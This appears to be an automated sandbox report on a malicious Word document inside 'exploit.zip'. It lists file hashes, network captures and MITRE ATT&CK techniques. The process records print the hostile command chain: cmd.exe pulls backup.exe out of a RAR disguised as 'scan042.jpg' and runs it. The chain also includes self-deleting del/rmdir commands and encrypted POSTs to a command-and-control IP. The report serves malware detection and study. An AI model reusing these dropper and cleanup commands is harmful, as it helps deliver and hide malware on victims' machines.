C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\22.LNK
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 6 10:57:10 2018, mtime=Thu Dec 6 10:57:10 2018, atime=Thu Dec 6 10:54:29 2018, length=56117, window=hide
Size (bytes):	2038
Entropy (8bit):	4.559734085346194
Encrypted:	false
MD5:	834C950CC52999FA002E0A9A5B6D24F4
SHA1:	F4FF391DCB7E0B12FDDB04ADEF1CC2882EA2A8DC
SHA-256:	79445ADB8C4C5E0536C59EFAF2E5099A1FC09450070A6B824EE3AA9FC0F73030
SHA-512:	24C6D05BDF35817F9D6DA49C859A8F8D5C9216B2F3963D0518EF3A99D41E8F94C0C8EFD40E09C3AC2F76AA917B263C8AA9362F8E647A6476842787A416C8EB77
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	39
Entropy (8bit):	4.208479141939171
Encrypted:	false
MD5:	7F0966AEDE9B3EDE9624604A72CB9D4A
SHA1:	FAFF69ABE653E5E4F55A8E9C2191F9273185F886
SHA-256:	565761C54EF28C5B7A844F11366D4A029BC99609A47D79B369EB68EA7B47E22F
SHA-512:	DC24BAF5D37F89907EB8A21032890AD40A3EEA20FF13420FD1BD46282601EBB82ECB43D2A8843B26572F62FDDC96A59456F2B7B1C98590795D547B253183D254
Malicious:	false
Reputation:	low

C:\Users\user\Desktop\backup.exe
Process:	C:\Program Files (x86)\WinRAR\Rar.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	3864512
Entropy (8bit):	7.787401904292289
Encrypted:	false
MD5:	1CBC626ABBE10A4FAE6ABF0F405C35E2
SHA1:	F6A7009DEF994CF5BB85C1B95C970CCB922603C3
SHA-256:	D123723E577B8E277E43399E6E54D155B782EDB332A70A54A92B729DAF287626
SHA-512:	7DAA52B58766CA6DA9AF1B5B937A24A446DB89D83245AC53DD74F4EBE6B702EA8132B7FD892C7898792587DE90FA31E6B84858ACA09CF502B34EA42341208133
Malicious:	false
Reputation:	low

C:\Users\user\Desktop\~$22.docx
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	2.4342669412187234
Encrypted:	false
MD5:	83581BD58BD9CDB7C4A0E34912EDA535
SHA1:	1DAA734668C8307C330EBA4D899F15602F3FFCC6
SHA-256:	FC71FC8A2A8EC79C8EE6698E84E1238197FB1113B439221EB1CD35E9F584E22B
SHA-512:	9E1461BC94E3678AAF7723D7E998A1A9D0A38EB193F696A92114369AC042AB5EE87936EF9AF16A3F44EDA7FB00687B637CF661492FDEDE0DEFFA0C2C9C965560
Malicious:	false
Reputation:	low

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://188.241.58.68/search	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr	backup.exe.5.dr	false	high
https://www.thawte.com/cps0/	backup.exe.5.dr	false	high
http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07	backup.exe.5.dr	false	high
http://pki-ocsp.symauth.com0	backup.exe.5.dr	false	unknown
https://www.thawte.com/repository0W	backup.exe.5.dr	false	high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
188.241.58.68	Romania		51177	THCPROJECTSRO	false

Static File Info

General
File type:	Zip archive data, at least v2.0 to extract
Entropy (8bit):	7.9992762521355685
TrID:	ZIP compressed archive (4004/1) 100.00%
File name:	exploit.zip
File size:	3375503
MD5:	affeafe0002e6aa7f0d03822e3c6fca3
SHA1:	ca4cae083077d7cfae2c80c507d98fae90c6ee5e
SHA256:	610057ac469c5d978973f4921b44ac88a3a41c4d4518af38085cc38dafc8c0f9
SHA512:	806adc00aa16e194259d45b865ea8f798255e8dea88bb74acfa6628b75db9dd41156ea5ef0748edf722cc86060fd4d95ad09203f49f52678545abbf4f886b48f
File Content Preview:	PK.........f.M.o.9....5.......22.docx..epd=.&.........6333333333.m....v........g.........:G..K.\J.QJ... ......@..."....r......... ..E..\L.\.U<.L.u.=lm..@.).....7.?:.....1.....T.(f.........0..i..............h'.g..~....._^H...^.9.d.i..q.....#w?..!...=.=..

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2018 22:29:06.017182112 CET	49168	80	192.168.2.10	188.241.58.68
Dec 6, 2018 22:29:06.069195032 CET	80	49168	188.241.58.68	192.168.2.10
Dec 6, 2018 22:29:06.069382906 CET	49168	80	192.168.2.10	188.241.58.68
Dec 6, 2018 22:29:06.070615053 CET	49168	80	192.168.2.10	188.241.58.68
Dec 6, 2018 22:29:06.070878983 CET	49168	80	192.168.2.10	188.241.58.68
Dec 6, 2018 22:29:06.121860027 CET	80	49168	188.241.58.68	192.168.2.10
Dec 6, 2018 22:29:06.122395992 CET	80	49168	188.241.58.68	192.168.2.10
Dec 6, 2018 22:29:07.088265896 CET	80	49168	188.241.58.68	192.168.2.10
Dec 6, 2018 22:29:07.109668016 CET	49168	80	192.168.2.10	188.241.58.68
Dec 6, 2018 22:29:07.109853983 CET	49168	80	192.168.2.10	188.241.58.68
Dec 6, 2018 22:29:07.161889076 CET	80	49168	188.241.58.68	192.168.2.10
Dec 6, 2018 22:29:07.161916971 CET	80	49168	188.241.58.68	192.168.2.10
Dec 6, 2018 22:29:08.613364935 CET	80	49168	188.241.58.68	192.168.2.10
Dec 6, 2018 22:29:08.613646030 CET	49168	80	192.168.2.10	188.241.58.68
Dec 6, 2018 22:29:08.613825083 CET	49168	80	192.168.2.10	188.241.58.68
Dec 6, 2018 22:29:08.665195942 CET	80	49168	188.241.58.68	192.168.2.10

HTTP Request Dependency Graph

188.241.58.68

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.10	49168	188.241.58.68	80	C:\Users\user\Desktop\backup.exe

Timestamp	kBytes transferred	Direction	Data
Dec 6, 2018 22:29:06.070615053 CET	1	OUT	POST /search HTTP/1.1 Connection: Keep-Alive Content-Type: application/octet-stream Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Content-Length: 352 Host: 188.241.58.68
Dec 6, 2018 22:29:06.070878983 CET	1	OUT	Data Raw: 6c 63 34 6e 6a 66 68 47 39 58 33 34 67 71 66 65 46 4b 56 39 67 44 6a 4c 68 73 59 77 39 31 56 41 56 32 64 31 68 4e 37 45 6c 6f 74 71 61 76 4e 41 6f 4b 47 59 46 61 45 6d 75 78 7a 4d 2f 69 52 51 41 68 39 65 67 69 30 58 69 56 50 42 6a 56 37 6f 59 57 Data Ascii: lc4njfhG9X34gqfeFKV9gDjLhsYw91VAV2d1hN7ElotqavNAoKGYFaEmuxzM/iRQAh9egi0XiVPBjV7oYW0ScrixWlFsAlnAQZD8TX93aXAnJ+vEe4MR6IogH0/nkW291152lL2o5pzVC/UDJcn0o7EkJYTvC9CievmT8Aob+pyksVCVDra0S4bDb7azMYSZ3H6JCFjxtihGgTw2fvTXysdEp11KRjwJRo3wkQaNeaEQ/L5XoH7
Dec 6, 2018 22:29:07.088265896 CET	2	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 06 Dec 2018 21:29:04 GMT Content-Type: application/octet-stream Content-Length: 292 Connection: keep-alive Data Raw: 31 62 6c 6d 6e 69 72 4e 65 71 2b 6b 65 4a 57 45 36 46 61 70 6e 32 6e 79 68 6f 75 35 6f 79 79 76 6f 7a 6d 2b 50 42 32 46 4b 68 37 78 55 35 52 4a 57 51 5a 74 33 38 71 6b 45 30 43 62 6d 74 68 71 68 61 5a 76 68 52 63 51 73 63 51 42 36 6d 4f 74 6b 75 6b 43 2f 2f 78 2f 30 33 6c 2b 44 72 69 65 38 74 71 49 36 34 62 72 55 6b 2b 55 4c 44 45 56 78 32 37 4f 57 61 6e 56 6a 6c 65 61 79 59 6c 6a 62 6a 37 6f 7a 4d 49 41 79 35 4d 72 37 34 6f 74 73 4a 77 38 34 70 49 30 38 41 59 6e 5a 75 6f 37 35 38 61 38 39 48 77 74 6e 4b 71 74 49 78 6c 4f 6e 44 4b 70 52 6d 48 32 57 5a 53 38 52 71 71 75 45 2f 38 78 72 6c 43 41 61 52 5a 50 69 39 45 44 45 4f 51 57 79 72 6a 66 33 75 2f 36 72 46 5a 73 47 51 39 4e 64 4d 31 52 4f 33 41 4a 78 61 6c 53 38 33 4f 72 4e 70 45 72 73 68 59 75 73 67 55 72 50 75 68 51 33 36 41 6a 32 6b 45 4a 34 62 43 55 33 68 65 79 75 6e 49 64 71 48 63 4c 7a 43 2f 53 4e 53 73 3d Data Ascii: 1blmnirNeq+keJWE6Fapn2nyhou5oyyvozm+PB2FKh7xU5RJWQZt38qkE0CbmthqhaZvhRcQscQB6mOtkukC//x/03l+Drie8tqI64brUk+ULDEVx27OWanVjleayYljbj7ozMIAy5Mr74otsJw84pI08AYnZuo758a89HwtnKqtIxlOnDKpRmH2WZS8RqquE/8xrlCAaRZPi9EDEOQWyrjf3u/6rFZsGQ9NdM1RO3AJxalS83OrNpErshYusgUrPuhQ36Aj2kEJ4bCU3heyunIdqHcLzC/SNSs=
Dec 6, 2018 22:29:07.109668016 CET	2	OUT	POST /search HTTP/1.1 Connection: Keep-Alive Content-Type: application/octet-stream Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Content-Length: 32 Host: 188.241.58.68
Dec 6, 2018 22:29:07.109853983 CET	2	OUT	Data Raw: 52 72 00 95 5b 7b b3 9f 1f 33 09 5a 8c 57 e2 e9 3c 3b 1f ea 80 f8 68 19 a9 d7 b1 f4 9a 13 ca d7 Data Ascii: Rr[{3ZW<;h

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 1300 Parent PID: 1368

General

Start time:	22:28:19
Start date:	06/12/2018
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\22.docx
Imagebase:	0x13f380000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 2540 Parent PID: 1300

General

Start time:	22:28:24
Start date:	06/12/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\WINDOWS\system32\cmd.exe /c set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR; && cd /d %~dp0 & rar.exe e -o+ -r -inul *.rar scan042.jpg & rar.exe e -o+ -r -inul scan042.jpg backup.exe & backup.exe
Imagebase:	0x4a430000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: Rar.exe PID: 796 Parent PID: 2540

General

Start time:	22:28:24
Start date:	06/12/2018
Path:	C:\Program Files (x86)\WinRAR\Rar.exe
Wow64 process (32bit):	true
Commandline:	rar.exe e -o+ -r -inul *.rar scan042.jpg
Imagebase:	0x120000
File size:	572632 bytes
MD5 hash:	33A75BFB1B9038899B9BA5E2A06D5D57
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: Rar.exe PID: 1508 Parent PID: 2540

General

Start time:	22:28:25
Start date:	06/12/2018
Path:	C:\Program Files (x86)\WinRAR\Rar.exe
Wow64 process (32bit):	true
Commandline:	rar.exe e -o+ -r -inul scan042.jpg backup.exe
Imagebase:	0x1170000
File size:	572632 bytes
MD5 hash:	33A75BFB1B9038899B9BA5E2A06D5D57
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: backup.exe PID: 1288 Parent PID: 2540

General

Start time:	22:28:26
Start date:	06/12/2018
Path:	C:\Users\user\Desktop\backup.exe
Wow64 process (32bit):	true
Commandline:	backup.exe
Imagebase:	0x930000
File size:	3864512 bytes
MD5 hash:	1CBC626ABBE10A4FAE6ABF0F405C35E2
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: NVIDIAControlPanel.exe PID: 2904 Parent PID: 2676

General

Start time:	22:28:44
Start date:	06/12/2018
Path:	C:\Users\user\AppData\Local\NVIDIAControlPanel\NVIDIAControlPanel.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\NVIDIA~1\NVIDIAControlPanel.exe
Imagebase:	0xbd0000
File size:	3864512 bytes
MD5 hash:	1CBC626ABBE10A4FAE6ABF0F405C35E2
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 588 Parent PID: 1288

General

Start time:	22:28:52
Start date:	06/12/2018
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /C choice /D n /T 10 \|\| rmdir /S /Q C:\Users\user~1\AppData\Local\NVIDIA~1
Imagebase:	0x4a5f0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 2092 Parent PID: 1288

General

Start time:	22:28:52
Start date:	06/12/2018
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /C choice /D n /T 10 \|\| del /F /Q C:\Users\user~1\Desktop\backup.exe
Imagebase:	0x4a5f0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Reset < >

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process Monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process Monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception.
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Kernel drivers, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report exploit.zip

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

Exploits:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: WINWORD.EXE PID: 1300 Parent PID: 1368

General

Analysis Process: cmd.exe PID: 2540 Parent PID: 1300

General

Analysis Process: Rar.exe PID: 796 Parent PID: 2540

General

Analysis Process: Rar.exe PID: 1508 Parent PID: 2540

General

Analysis Process: backup.exe PID: 1288 Parent PID: 2540

General

Analysis Process: NVIDIAControlPanel.exe PID: 2904 Parent PID: 2676